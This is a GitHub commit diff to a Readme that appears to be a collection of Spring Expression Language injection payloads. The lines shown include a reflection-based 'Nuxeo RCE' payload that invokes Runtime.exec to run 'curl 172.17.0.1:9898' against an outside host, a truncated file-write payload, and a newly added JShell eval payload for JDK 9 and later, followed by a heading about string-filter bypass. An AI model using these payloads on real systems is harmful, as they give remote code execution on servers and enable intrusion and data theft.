We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 914df00 commit bca87f5Copy full SHA for bca87f5
1 file changed
shell/SPEL/Readme.md
@@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create("
83
Nuxeo RCE
84
''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898')
85
86
-
+
87
+jdk9+
88
89
+T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx');
90
```
91
92
字符串绕过
0 commit comments